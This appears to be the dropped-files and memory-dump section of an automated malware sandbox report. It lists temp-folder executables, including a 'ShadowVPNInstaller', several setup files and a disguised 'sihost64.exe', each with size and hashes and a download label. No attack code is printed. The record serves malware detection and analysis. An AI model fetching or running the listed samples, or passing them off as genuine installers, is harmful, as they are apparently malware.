cdea06242802cc4cb1b0ab2c663a7ee07abed801743036201576680eb61ae59da1f624428fed46cbeba9c225ffa4a068290f3fa26f4103abde76f3322c23d8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kdDPilen.~t5

Filesize
103KB

MD5
3a5d1bdea281c18ea044795ada56759b

SHA1
18a7d75b598dbd93baa5e77ce2e57bbbd18c0975

SHA256
436d167234c2913c51685816549be0a32fb5f6b4eb7724797aa211a6b98f1b54

SHA512
3f58d8c995b32f0724fb295c7fdcfed6f884a6d0338193bd29a6fc97d3ac907516dfc04aab0eb41f565db110fcb0a0d4e5a78140860b73fa2ad8696ccdc7ad3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\mzanA.e

Filesize
270KB

MD5
4048075ba32058b2ffb4d02fd8f88568

SHA1
9d35c34fdadce90fa5e8debce667429b9a126059

SHA256
98f66e3e4a0015b41c8598da139dc3ef4f9a7d5795ec8ebeeee1afa48bef2d6b

SHA512
4670adf32f1d1843e4fead5d78946c46ea1b5eaf3d1967ac87ff474b076d0f2f279ad115b22bb6dbfe72fc4b251f6fc86fa1cc12d5f24048e4801cafbef2eb18

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\oAykH.~~

Filesize
261KB

MD5
da678f3df8a1104ec2ce8c9816b5156c

SHA1
f25f50f2a134270ff5d68fb9334e05e04a499798

SHA256
0f3a327e883e7fd4ec2377e0bf624504fdf91ba8a998d90bcd5d3c0895a26456

SHA512
b040d9211ba1504fd0807c9708a9e925fc33ec2819c2d4aa05462ccc1fc2794fd10d045533b9e4d584147f5c8882cfec0f06213e177b6b932d64fccd30852991

Download Submit
C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_t1.exe

Filesize
193KB

MD5
9817a5df2c2b96fb61dbb3f6e651454b

SHA1
805684c42ba72268ecd50a40d375b0105fd6ca34

SHA256
339bd9d2f34045362351b411cc3e43669aecb1d274a39c57ded6fae8493977f9

SHA512
01edf90787c3951aef48a8ebce55602d0e4d92f7d16f9676280b5c48272c76a8167d887f31fdf106ac6006ca3d938626822c13f4dd9b3ea3f78368a506e4c94f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3fhr0yz0.srk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bskr.exe

Filesize
7KB

MD5
7b8be52c88540555f6c018ed6e05b8c6

SHA1
96ac0ba5b2756029059f5cc5e3647e313837035f

SHA256
827212894ac100a11de081450bc22de84188fa50ead06f2555cc921c5dc2566c

SHA512
92aac381fb32fb175a9f3f2a4188fd373539eff489afc5d3f92c05ea0b19b700959e42731e162fb13f558e88405f9a3765ed0ae4c4dc13530c326f727f678ef3

Download Submit
C:\Users\Admin\AppData\Local\Temp\e59049a.exe

Filesize
9KB

MD5
99c8a5f7c87b4ec0ac66592a85e129f5

SHA1
3699ef050962cfa6e3d6440a941396c9f022ea52

SHA256
899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad

SHA512
a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18

Download Submit
C:\Users\Admin\AppData\Local\Temp\inst3.exe

Filesize
213KB

MD5
20cfa83a75bd66501690bbe0ed14bfcd

SHA1
78585666bbfd350888c5c765b74872be01b85248

SHA256
b8cf9f3f5230b901fd2606a3a7e03d3a956494bf73c74244d9581c18a029b36b

SHA512
4aefed7006811bb9ecf5e3d5b3afba93ca9c3ebac74390e1f8bd7c2e9796f1b2dbb5641ee8fbd580d1ea02b5146e38aff724de520f8ad6bb1ee707b48842b78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-AEAM1.tmp\_isetup\_shfoldr.dll

Filesize
22KB

MD5
92dc6ef532fbb4a5c3201469a5b5eb63

SHA1
3e89ff837147c16b4e41c30d6c796374e0b8e62c

SHA256
9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87

SHA512
9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-CRDU5.tmp\idp.dll

Filesize
216KB

MD5
b37377d34c8262a90ff95a9a92b65ed8

SHA1
faeef415bd0bc2a08cf9fe1e987007bf28e7218d

SHA256
e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

SHA512
69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-P88P5.tmp\setup_2.tmp

Filesize
691KB

MD5
9303156631ee2436db23827e27337be4

SHA1
018e0d5b6ccf7000e36af30cebeb8adc5667e5fa

SHA256
bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4

SHA512
9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

Download Submit
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

Filesize
1.3MB

MD5
f9be28007149d38c6ccb7a7ab1fcf7e5

SHA1
eba6ac68efa579c97da96494cde7ce063579d168

SHA256
5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914

SHA512
8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

Download Submit
C:\Users\Admin\AppData\Local\Temp\kZ_AmsXL.6G

Filesize
1.2MB

MD5
e141dd69d1cf6a3a0bd9c185a0064b49

SHA1
959a997e66acd8410343ed3efed3e5929494b125

SHA256
3a15463ef6c1296aecb36fd653f22938adfe9f9f42c6d5ef24630f22827a70a3

SHA512
efdc55d1c729f08275c5f6cda531baf6db98347b91db377e9f3cddb9399afb0d20bbcadbb103c25d7af48b90409e8bdf77c0065d2285b955a047c66349263999

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
253KB

MD5
15716f1e5fdf1413c724eaac1ce2af62

SHA1
6593190a207f6f0e4886ce8e04e72228bb88b27b

SHA256
37febabd048d3719096d86ffc24ca2869da07e65426101d82fb00536558b2393

SHA512
c15907e0956ea4c1c01eadbb8a88ddcb7c03c79eef9f08f1e367cb4650621dbac3d1ebab1dbeb564c337d19244f38ad3cc4106d40867d59c33a5e5c766ed01fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup_2.exe

Filesize
1.7MB

MD5
a7703240793e447ec11f535e808d2096

SHA1
913af985f540dab68be0cdf999f6d7cb52d5be96

SHA256
6a17ebf5da6aa3a1f4813e5f46fdd5d19d026bcfac91f232359f98e43df3c38f

SHA512
57bdcdfcfa11f6b5bf4149be0fee0444fcf67ccececf1009b166b17b7dce30da1a472f1890736186f4ef76e02ed23cc0dd2a41dc9bff94218a059832d4b5c69e

Download Submit
C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe

Filesize
1.0MB

MD5
f39dd2806d71830979a3110eb9a0ae44

SHA1
fd94b99664d85eede48ab22f27054ab5cc6dd2d3

SHA256
c5763dba038b94970b85fd0a078bcb1977e3973c56780e76b443915a9c30e213

SHA512
ffc5a57fa4982a425e1bb2077affba0113d92365ad6eae849e9d700ee99615128c965de3705d2f2a12c1b46230ef2fc1820e4b74b8a3938b1b7211a228db9e82

Download Submit
C:\Users\Admin\AppData\Local\Temp\xnYHaMkotIKyFYFGWL\OIQVxx

Filesize
42KB

MD5
9dabbd84d79a0330f7635748177a2d93

SHA1
73a4e520d772e4260651cb20b61ba4cb9a29635a

SHA256
a6e4be06d34448f4efa8655a3ae6e294c98ae4cb42f7c3da3be06b419fa8389d

SHA512
020114ba08ccb7ad7934e2046d2b61ebd1b006b8c31194f2cfb49ff4397f4db35dc67c8191552346d04709dee4871a13797cf284ef543e7280bc390a6746a314

Download Submit
C:\Users\Admin\AppData\Local\Temp\{QsTu-86O6x-ETe7-U8A5A}\80613230256.exe

Filesize
277B

MD5
6445250d234e789c0c2afe69f119e326

SHA1
03074f75c0ff50783d8c2e32d96e39b746540f66

SHA256
2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f

SHA512
ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

Filesize
7KB

MD5
339347f8a4bc7137b6a6a485f6cd0688

SHA1
9b198dc642f9f32ea38884d47c1fe7d8868e3f39

SHA256
c6f8eec2d3204bad0712705405fdb09555bf2bc26f83f0cf1d7966b86a46f601

SHA512
04c73aa7cff15895daf42119873df920e2ee9500d1293f470ad590cbd9cccf09f6df206f1aa9fa09e744f404f5365174f570a7f33a9a642453531dcfbaeb26fd

Download Submit
memory/1204-473-0x00000000004B0000-0x00000000004B8000-memory.dmp

Filesize
32KB

Download
memory/1724-266-0x0000000005760000-0x0000000005D78000-memory.dmp

Filesize
6.1MB

Download
memory/1724-270-0x0000000005480000-0x000000000558A000-memory.dmp

Filesize
1.0MB

Download
memory/1724-271-0x00000000053F0000-0x000000000542C000-memory.dmp

Filesize
240KB

Download
memory/1724-272-0x0000000005430000-0x000000000547C000-memory.dmp

Filesize
304KB

Download
memory/1724-269-0x0000000005310000-0x0000000005322000-memory.dmp

Filesize
72KB

Download
memory/1724-259-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/1928-143-0x00000000071F0000-0x00000000071FA000-memory.dmp

Filesize
40KB

Download
memory/1928-95-0x00000000056E0000-0x0000000005772000-memory.dmp

Filesize
584KB

Download
memory/1928-141-0x0000000007290000-0x000000000732C000-memory.dmp

Filesize
624KB

Download
memory/1928-255-0x0000000007230000-0x0000000007286000-memory.dmp

Filesize
344KB

Download
memory/1928-97-0x0000000005780000-0x000000000578A000-memory.dmp

Filesize
40KB

Download
memory/1928-256-0x0000000007330000-0x000000000735A000-memory.dmp

Filesize
168KB

Download
memory/1928-123-0x0000000006D30000-0x0000000006D86000-memory.dmp

Filesize
344KB

Download
memory/1928-89-0x0000000000CA0000-0x0000000000DE4000-memory.dmp

Filesize
1.3MB

Download
memory/1928-94-0x0000000005DF0000-0x0000000006394000-memory.dmp

Filesize
5.6MB

Download
memory/2632-157-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2632-109-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2668-228-0x0000000002CD0000-0x0000000002CE2000-memory.dmp

Filesize
72KB

Download
memory/2668-227-0x0000000002C20000-0x0000000002C2E000-memory.dmp

Filesize
56KB

Download
memory/2668-14-0x00000000001A0000-0x00000000001B0000-memory.dmp

Filesize
64KB

Download
memory/2668-17-0x00007FFA0FF63000-0x00007FFA0FF65000-memory.dmp

Filesize
8KB

Download
memory/2960-219-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2960-152-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/2976-220-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/3044-380-0x0000000004CC0000-0x0000000004D46000-memory.dmp

Filesize
536KB

Download
memory/3044-379-0x0000000004C30000-0x0000000004CBB000-memory.dmp

Filesize
556KB

Download
memory/3044-406-0x0000000000F40000-0x0000000000F41000-memory.dmp

Filesize
4KB

Download
memory/3044-383-0x0000000004CC0000-0x0000000004D46000-memory.dmp

Filesize
536KB

Download
memory/3044-377-0x0000000003700000-0x0000000003792000-memory.dmp

Filesize
584KB

Download
memory/3044-378-0x00000000037A0000-0x0000000004C22000-memory.dmp

Filesize
20.5MB

Download
memory/3044-251-0x0000000003700000-0x0000000003792000-memory.dmp

Filesize
584KB

Download
memory/3044-250-0x0000000003650000-0x00000000036F4000-memory.dmp

Filesize
656KB

Download
memory/3044-254-0x0000000003700000-0x0000000003792000-memory.dmp

Filesize
584KB

Download
memory/3044-322-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3056-155-0x0000000000400000-0x00000000004BD000-memory.dmp

Filesize
756KB

Download
memory/3372-217-0x0000000003190000-0x0000000003222000-memory.dmp

Filesize
584KB

Download
memory/3372-214-0x0000000003190000-0x0000000003222000-memory.dmp

Filesize
584KB

Download
memory/3372-221-0x0000000000400000-0x000000000053A000-memory.dmp

Filesize
1.2MB

Download
memory/3372-231-0x0000000003190000-0x0000000003222000-memory.dmp

Filesize
584KB

Download
memory/3372-213-0x00000000030E0000-0x0000000003184000-memory.dmp

Filesize
656KB

Download
memory/3372-232-0x0000000003230000-0x00000000046B2000-memory.dmp

Filesize
20.5MB

Download
memory/3372-234-0x00000000046C0000-0x000000000474B000-memory.dmp

Filesize
556KB

Download
memory/3372-246-0x0000000004750000-0x00000000047D6000-memory.dmp

Filesize
536KB

Download
memory/3380-314-0x0000000007B70000-0x00000000081EA000-memory.dmp

Filesize
6.5MB

Download
memory/3380-337-0x0000000007770000-0x0000000007784000-memory.dmp

Filesize
80KB

Download
memory/3380-274-0x0000000005450000-0x0000000005A78000-memory.dmp

Filesize
6.2MB

Download
memory/3380-295-0x0000000072B70000-0x0000000072BBC000-memory.dmp

Filesize
304KB

Download
memory/3380-294-0x00000000073F0000-0x0000000007422000-memory.dmp

Filesize
200KB

Download
memory/3380-310-0x00000000067C0000-0x00000000067DE000-memory.dmp

Filesize
120KB

Download
memory/3380-311-0x0000000007430000-0x00000000074D3000-memory.dmp

Filesize
652KB

Download
memory/3380-273-0x00000000028A0000-0x00000000028D6000-memory.dmp

Filesize
216KB

Download
memory/3380-315-0x0000000007530000-0x000000000754A000-memory.dmp

Filesize
104KB

Download
memory/3380-316-0x00000000075A0000-0x00000000075AA000-memory.dmp

Filesize
40KB

Download
memory/3380-289-0x0000000005E10000-0x0000000006164000-memory.dmp

Filesize
3.3MB

Download
memory/3380-323-0x00000000077B0000-0x0000000007846000-memory.dmp

Filesize
600KB

Download
memory/3380-282-0x0000000005A80000-0x0000000005AA2000-memory.dmp

Filesize
136KB

Download
memory/3380-287-0x0000000005C20000-0x0000000005C86000-memory.dmp

Filesize
408KB

Download
memory/3380-330-0x0000000007730000-0x0000000007741000-memory.dmp

Filesize
68KB

Download
memory/3380-288-0x0000000005D00000-0x0000000005D66000-memory.dmp

Filesize
408KB

Download
memory/3380-336-0x0000000007760000-0x000000000776E000-memory.dmp

Filesize
56KB

Download
memory/3380-292-0x0000000006210000-0x000000000622E000-memory.dmp

Filesize
120KB

Download
memory/3380-338-0x0000000007870000-0x000000000788A000-memory.dmp

Filesize
104KB

Download
memory/3380-339-0x0000000007850000-0x0000000007858000-memory.dmp

Filesize
32KB

Download
memory/3956-218-0x0000000000C60000-0x0000000000C6C000-memory.dmp

Filesize
48KB

Download
memory/3956-76-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/3956-78-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/3956-60-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/4212-160-0x0000000000670000-0x0000000000770000-memory.dmp

Filesize
1024KB

Download
memory/4212-211-0x0000000000400000-0x00000000004D7000-memory.dmp

Filesize
860KB

Download
memory/4280-0-0x0000000074FAE000-0x0000000074FAF000-memory.dmp

Filesize
4KB

Download
memory/4280-1-0x0000000000160000-0x0000000000786000-memory.dmp

Filesize
6.1MB

Download
memory/4376-147-0x0000000000250000-0x0000000000258000-memory.dmp

Filesize
32KB

Download
memory/4576-58-0x00000000014C0000-0x00000000014D2000-memory.dmp

Filesize
72KB

Download
memory/4576-67-0x0000000000A00000-0x0000000000A41000-memory.dmp

Filesize
260KB

Download
memory/4576-57-0x0000000000F80000-0x0000000000F90000-memory.dmp

Filesize
64KB

Download
memory/5024-212-0x0000000000400000-0x000000000044C000-memory.dmp

Filesize
304KB

Download
memory/5624-397-0x0000000000890000-0x0000000000896000-memory.dmp

Filesize
24KB

Download